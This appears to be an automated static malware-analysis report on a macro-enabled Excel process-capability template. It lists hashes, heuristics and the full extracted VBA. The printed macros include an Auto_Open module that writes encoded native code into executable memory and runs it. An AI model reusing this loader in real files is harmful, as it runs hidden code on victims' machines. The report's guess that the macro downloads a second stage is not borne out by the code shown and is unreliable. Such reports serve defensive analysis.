Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c583106910a74973…

MALICIOUS

Office (OOXML)

Size: 163.9 KB
Created: 2013-06-04 12:27:04 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2020-09-24
MD5: ee5cfd02dfe7a5d55d8cab0194368a2c
SHA-1: d2a497871d233c5b7578aba7c8bb0d8f988a1ac0
SHA-256: c583106910a7497354c02ed6c3753bab739a1930df86d5bf0a4c40e5068d9f64
Risk score: 154

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is an OOXML document containing VBA macros that run from both the Workbook_Open and Auto_Open events. The CreateObject calls and the obfuscated module that allocates executable memory with VirtualAlloc indicate the macro is designed to execute arbitrary code, likely to download a second-stage payload. The embedded URLs are suspicious and may be related to payload delivery or C2 infrastructure.

Heuristics 9

  • VBA project inside OOXML (severity: medium, 4 related findings, rule OOXML_VBA)
    Document contains a VBA project; VBA macros present (project part renamed away from vbaProject.bin: xl/printerSettings.bin)
  • VBA project part renamed to evade filename detection (severity: high, rule OOXML_VBA_PROJECT_RENAMED)
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • CreateObject call (severity: high, rule OLE_VBA_CREATEOBJ)
    Matched lines in script:
        Dim drv     As Object
        Set fsObj = CreateObject("Scripting.FileSystemObject")
        Set drv = fsObj.Drives("C")
  • Workbook_Open macro (severity: low, rule OLE_VBA_WBOPEN)
    Matched lines in script:
        Private Sub Workbook_Open()
         ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVeryHidden
  • Auto_Open macro (severity: low, rule OLE_VBA_AUTO)
    Matched line in script:
        Public Sub Auto_Open()
  • External relationship (severity: medium, rule OOXML_EXTERNAL_REL)
    External target in xl/externalLinks/_rels/externalLink1.xml.rels: /Users/Admin/Google Drive/sixsigmablackbelt/Freie Dateien/Prozessfaehigkeit-Maschinenfaehigkeit-Vorlage-Excel-kurz-20190
  • External hyperlinks (2) (severity: low, rule OOXML_EXTERNAL_HYPERLINKS)
    Document contains 2 external hyperlinks; clickable URLs are stored as external relationships. First target: https://www.sixsigmablackbelt.de/
  • Hidden worksheet (veryHidden) (severity: low, rule OOXML_HIDDEN_SHEET)
    Excel workbook contains 2 hidden sheet(s); hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL (severity: info, rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs and the channel that reached each:
      • https://www.sixsigmablackbelt.de (document hyperlink)
      • https://www.sixsigmablackbelt.de/ (document hyperlink)
      • https://order.shareit.com/product?vendorid=200286567&productid=300977794 (OOXML external relationship)

Extracted artifacts 3

Files carved from inside the sample during analysis.

  • macros.bas (kind: vba-macro, source: oletools.olevba.extract_macros (decoded VBA source from OOXML), size: 15533 bytes)
    SHA-256: d65a95d9c800f1a3a5b892e959c8f3621bbe52a3f76beaebe0f847077d94f96b
    Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "mAPI"
Option Explicit

'--------------------------------------------------------------
' This VBA Project has been protected with a proprietary scheme
' Do NOT tamper with this file, as Excel may crash!
'--------------------------------------------------------------

Private Const OPTION_BASE                  As Long = 0
Private Const OPTION_FLAGS                 As Long = 2
Private Const OPTION_INCLUDE_REFERENCEDOCS As Long = 0
Private Const OPTION_DISABLEDCLASSES       As String = ""
Private Const PAGE_EXECUTE_RW              As Long = &H40
Private Const MEM_RESERVE_AND_COMMIT       As Long = &H3000
Private Const MEM_RELEASE                  As Long = &H8000
Private Const ERR_OUT_OF_MEMORY            As Long = &H7
Private Const ROOTOBJECT_SIZE              As Long = &H4D948

Private m_Loader As VCOMInitializerStruct
Private m_VCOMObject As Object

#If VBA7 = False Then
    Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Address As Long, ByVal Size As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long
    Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal ProcName As String) As Long
    Private Declare Function GetProcAddress Lib "kernel32" (ByVal Module As Long, ByVal ProcName As String) As Long
    Private Declare Function VirtualFree Lib "kernel32" (ByVal lpAddress As Long, ByVal Size As Long, ByVal dwFreeType As Long) As Long
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Dest As Any, ByRef Source As Any, ByVal Size As Long)
    Private Const VBA_VERSION              As Long = 6

    Private Type VCOMInitializerStruct
        vtbl_QueryInterface As Long
        vtbl_AddRef As Long
        vtbl_Release As Long
        vtbl_GetTypeInfoCount As Long
        vtbl_GetTypeInfo As Long
        vtbl_GetIDsOfNames As Long
        vtbl_Invoke As Long
        RootObjectMem As Long
        HelperObject As Object
        SysFreeString As Long
        GetProcAddress As Long
        NativeCode As String
        LoaderMem As Long
        IgnoreFlag As Boolean
        VTablePtr As Long
        Kernel32Handle As Long
        RootObject As Object
        ClassFactory As Object
    End Type
#Else
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Address As LongPtr, ByVal Size As LongPtr, ByVal AllocationType As Long, ByVal Protect As Long) As LongPtr
    Private Declare PtrSafe Function GetModuleHandleA Lib "kernel32" (ByVal ProcName As String) As LongPtr
    Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal Module As LongPtr, ByVal ProcName As String) As LongPtr
    Private Declare PtrSafe Function VirtualFree Lib "kernel32" (ByVal lpAddress As LongPtr, ByVal Size As LongPtr, ByVal dwFreeType As Long) As Long
    Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Dest As Any, ByRef Source As Any, ByVal Size As LongPtr)
    Private Const VBA_VERSION              As Long = 7

    Private Type VCOMInitializerStruct
        vtbl_QueryInterface As LongPtr
        vtbl_AddRef As LongPtr
        vtbl_Release As LongPtr
        vtbl_GetTypeInfoCount As LongPtr
        vtbl_GetTypeInfo As LongPtr
        vtbl_GetIDsOfNames As LongPtr
        vtbl_Invoke As LongPtr
        RootObjectMem As LongPtr
        HelperObject As Object
        SysFreeString As LongPtr
        GetProcAddress As LongPtr
        NativeCode As String
        LoaderMem As LongPtr
        IgnoreFlag As Boolean
        VTablePtr As LongPtr
        Kernel32Handle As LongPtr
        RootObject As Object
        ClassFactory As Object
    End Type
#End If

Public Sub Auto_Open()

    With m_Loader
        .NativeCode = "%EEEE%::::PPPPPPPPPH+D$ XXXtNXXXXXXVSPPPPj PPPPPPPP4T)D$04P)D$,4'4 )D$($ PZ3D$@+D$ YQ3H +L$ XP3Q +T$0XPf55ntvf)B|+T$0+T$0+T$0R[YQ^VXP2CP<0tF1D$$kD$$@!L$$2CQ1D$$kD$$@!L$$2CR1D$$kD$$@!L$$2CS+\$,3BP1BP1rP3rP+T$(  XXXXXXXXXXXXX[^tJAYAZQ4tPPPPH)D$@4pH)D$84'4 H)D$0$ PH+L$ H3AtH+D$ L3PtL+T$HXPf55{L+T$HL+T$HtqfA)B8ARA[YQXPA2CD<0tR1D$0kD$0@L!L$0A2CE1D$0kD$0@L!L$0A2CF1D$0kD$0@L!L$0A2CGL+\$@A3BDA1BDA1JDA3JDL+T$8  XXXXXYXXXXqBLHOJA@n[??n[=ezoieZZprkhs^ljbZljbZ=bNZ_Q_>HirF[Q^Z[IrzRM wGDDoeTtKTfdGVduCVduCGhiCGhygGhygCmzXGcH[D_J^DV VfF VX<TI@<_veu]flqomliCuelQxpdudatE@hrwIkzSMzvOizw_Mzw_MssLJssLZBCLZ@A]^@A]^TNa^oFmn^nIv@aSsbT?WeWnSg_DCgKjKWCgHe[wJGe;?@fj;Ifyr@cfMAmTN_rNKNzxilIhMnADMgDV@cm;<jihu?aE=]rdY\puMUpgDuAa;UqSWBSPSUG=LUFNNESSOPGVYEbGXQWROj__GHKjOj_MIHKj^x?IRh=XVh=XVKH<VYKlJWLbAEtOIg@nIDT^HJVOD[KGudwGDEeFT[reTWJ@\ht>a;r>cruLna<Mniy?eKL_]zy?\pznXpznXANNXIL_\IL_\xSc\iMIUzQIdEoomgyo=XAyzJCDBXN>=QKmvHmtvO]HXO]J\O]J\m]hV?]mXmQvgl=tdpaS RUqPBV \PRocNMQflywB>;gFluaO?jKF@UIO ai_vUJ[apwFqeFGfACZVu>[0"

        .LoaderMem = VirtualAlloc(0, Len(.NativeCode), MEM_RESERVE_AND_COMMIT, PAGE_EXECUTE_RW)
        If .LoaderMem = 0 Then Err.Raise ERR_OUT_OF_MEMORY

        .RootObjectMem = VirtualAlloc(0, ROOTOBJECT_SIZE, MEM_RESERVE_AND_COMMIT, PAGE_EXECUTE_RW)
        If .RootObjectMem = 0 Then Err.Raise ERR_OUT_OF_MEMORY

        .vtbl_QueryInterface = .LoaderMem
        .VTablePtr = VarPtr(m_Loader)
        .Kernel32Handle = GetModuleHandleA("KERNEL32")
        .GetProcAddress = GetProcAddress(.Kernel32Handle, "GetProcAddress")
        .SysFreeString = GetProcAddress(GetModuleHandleA("OLEAUT32"), "SysFreeString")
        Call CopyMemory(ByVal .LoaderMem, ByVal .NativeCode, Len(.NativeCode))
        Call CopyMemory(.RootObject, VarPtr(.VTablePtr), LenB(.VTablePtr))
        .IgnoreFlag = TypeOf .RootObject Is VBA.Collection
        Set .ClassFactory = (.RootObject)
        Set .RootObject = Nothing
        VirtualFree .LoaderMem, 0, MEM_RELEASE
        Call .ClassFactory.Init(.Kernel32Handle, .GetProcAddress, OPTION_BASE + OPTION_FLAGS, VBA_VERSION, .HelperObject)
        Set m_VCOMObject = .ClassFactory.GetErrEx()
    End With

End Sub


Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'###################################################
'Procedure
'Open module: Module Funktion_und_Lizenz
'Enter company name -> strLizenzfuer = "Roland"
'save file and close
'open file
'Run sub: Lizenz_setzen_in_Berechnungsblatt()
'Run sub: speichern_mit_Lizenz
'###################################################




'Run sub: Lizenz_setzen_in_Berechnungsblatt()
'Run sub: speichern_mit_Lizenz
'###################################################

''''''''''''''''''''''''''''''''''''''''''''''''''''''''

'         Sheet protection password "4twpq30qcb"

''''''''''''''''''''''''''''''''''''''''''''''''''''''''


Private Sub Workbook_Open()
 ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVeryHidden
 
 Call Lizenz
 With ActiveSheet.PageSetup
                .RightFooter = "&""Arial""&12" & "    licensed to " & strLizenzfuer & " © by www.sixsigmablackbelt.de    "
                '.CenterHeader = "&""Arial""&60&KE6E6E6" & Chr(10) & Chr(10) & Chr(10) & "w w w . s i x s i g m a b l a c k b e l t . d e"
 End With
 
 
  hdnum_anzeigen
 
 Hinweis.Show
 
End Sub


Private Sub Lizenzierung()

Call Workbook_Open
Call Lizenz_setzen_in_Berechnungsblatt
Call speichern_mit_Lizenz
ThisWorkbook.Close SaveChanges:=False

End Sub
Private Sub Lizenz_setzen_in_Berechnungsblatt()

ThisWorkbook.Sheets("Berechnung").Cells(1, 1).Value = strLizenzfuer

End Sub

Private Sub speichern_mit_Lizenz()
Dim Datei As String
ChDir "C:\Users\Admin\Google Drive\sixsigmablackbelt\Kundendateien"
Datei = "process_capability_template__v1_" & strLizenzfuer & Format(Date, "_yyyy_mm_dd") & ".xlsm"
ActiveWorkbook.SaveAs Filename:= _
Datei, FileFormat:=xlOpenXMLWorkbookMacroEnabled, CreateBackup:=False

ChDir "C:\Users\Admin\Google Drive\sixsigmablackbelt\Kundendateien"
Datei = "process_capability_template_v1_" & strLizenzfuer & Format(Date, "_yyyy_mm_dd_org") & ".xlsm"
ActiveWorkbook.SaveAs Filename:= _
Datei, FileFormat:=xlOpenXMLWorkbookMacroEnabled, CreateBackup:=False

End Sub




Public Sub Workbook_BeforeClose(Cancel As Boolean)

 ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVeryHidden



End Sub
Private Sub Workbook_BeforePrint(Cancel As Boolean)
    With ActiveSheet.PageSetup
                .RightFooter = "&""Arial""&12" & "    licensed to " & strLizenzfuer & " © by www.sixsigmablackbelt.de    "
                '.CenterHeader = "&""Arial""&60" & KE6E6E6 & Chr(10) & "w w w . s i x s i g m a b l a c k b e l t . d e"
 End With

End Sub
Public Sub Berechnung_anzeigen()

 ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVisible

End Sub
Public Sub translation_anzeigen()

 ThisWorkbook.Sheets("translation").Visible = xlSheetVisible

End Sub

Private Sub namen_verbergen()

For Each n In ActiveWorkbook.Names
n.Visible = False
Next n

End Sub

Private Sub namen_anzeigen()

For Each n In ActiveWorkbook.Names
n.Visible = True
Next n

End Sub




Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Funktionen_und_Lizenz"
Public strLizenzfuer As String

Sub Lizenz()
strLizenzfuer = "invalid license"
End Sub

Sub hdnum_anzeigen()
Dim FestplatteID As String
FestplatteID = HDNUM()
Hinweis.textbox_FestplattenID.Value = "Hard Disk ID: " & FestplatteID

End Sub

Public Function HDNUM() As String
    Dim fsObj   As Object
    Dim drv     As Object
    Set fsObj = CreateObject("Scripting.FileSystemObject")
    Set drv = fsObj.Drives("C")
    HDNUM = Hex(drv.serialnumber)
End Function


Attribute VB_Name = "Funktionen"
'six_a
'six_m
'six_st
'six_cmu
'six_cmo
'six_cm
'six_ck
'six_md

Public Function six_m(xi As Range) As Double
 six_m = WorksheetFunction.Average(xi)
End Function

Public Function six_st(xi As Range) As Double
 six_st = WorksheetFunction.StDev(xi)
End Function

Public Function six_a(xi As Range) As Double
 six_a = WorksheetFunction.Count(xi)
End Function

Public Function six_cmu(Mittelwert As Double, UGW As Double, Standardabweichung As Double) As Double
    six_cmu = ((Mittelwert - UGW) / (3 * Standardabweichung))
End Function

Public Function six_cmo(OGW As Double, Mittelwert As Double, Standardabweichung As Double) As Double
    six_cmo = ((OGW - Mittelwert) / (3 * Standardabweichung))
End Function
Public Function six_cm(OGW As Double, UGW As Double, Standardabweichung As Double) As Double
    six_cm = ((OGW - UGW) / (6 * Standardabweichung))
End Function
Public Function six_ck(cmo As Double, cmu As Double) As Double
    six_ck = WorksheetFunction.Min(cmo, cmu)
End Function
Public Function six_md(cmo As Double, cmu As Double) As Double
    six_md = WorksheetFunction.Min(cmo, cmu)
End Function


Attribute VB_Name = "Bereinigen"
Sub Bereinigen()


Worksheets("Berechnung").Range("b1:l4").ClearContents
Worksheets("Berechnung").Range("b1:b204").ClearContents
Worksheets("Berechnung").Range("e1:e204").ClearContents
Worksheets("Berechnung").Range("h1:h204").ClearContents
Worksheets("Berechnung").Range("k1:k204").ClearContents

Worksheets("Berechnung").Range("o5:p35").ClearContents
Worksheets("Berechnung").Range("p58:y63").ClearContents
Worksheets("Berechnung").Range("bl4:bl20").ClearContents
Worksheets("Berechnung").Range("ad3:bp4").ClearContents

End Sub

Sub Rahmen()
'
' Makro2 macro
'

'
    Cells.Select
    Selection.Borders(xlDiagonalDown).LineStyle = xlNone
    Selection.Borders(xlDiagonalUp).LineStyle = xlNone
    With Selection.Borders(xlEdgeLeft)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlEdgeTop)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlEdgeBottom)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlEdgeRight)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlInsideVertical)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
    With Selection.Borders(xlInsideHorizontal)
        .LineStyle = xlContinuous
        .ColorIndex = 0
        .TintAndShade = 0
        .Weight = xlThin
    End With
End Sub


Attribute VB_Name = "Hinweis"
Attribute VB_Base = "0{2DD6D6E0-E769-4624-BAB5-E1D5AEF9D4D7}{A8479FF1-66B3-44C3-876C-579C574CB0DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub button_website_oeffnen_Click()

strWebsite = "https://order.shareit.com/product?vendorid=200286567&productid=300977794"
   ActiveWorkbook.FollowHyperlink Address:=strWebsite, NewWindow:=True

End Sub

Private Sub Formularschliessen_Click()

Unload Me
End Sub





'Private Sub UserForm_QueryClose(Cancel As Integer, CloseMode As Integer)
'If CloseMode = vbFormControlMenu Then
'        MsgBox "Dieser Hinweis schließt automatisch 30 Sekunden nach Erscheinen"
'        Cancel = True
'End If
'End Sub

Private Sub TextBox2_Change()

End Sub

Attribute VB_Name = "Tabelle4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

  • vbaProject_00.bin (kind: vba-project, source: OOXML VBA project xl/vbaProject.bin, size: 7680 bytes)
    SHA-256: 6a16c87b775311033081d02b1fce6a5433ac17f9dfba9aea51a8a8a21b54f861
  • vbaProject_01.bin (kind: vba-project, source: OOXML VBA project xl/printerSettings.bin, size: 60928 bytes)
    SHA-256: f3a3bc207d67cbd78c2df8dd2da798baac02b5194642ae1e58cbcb137fe98ba6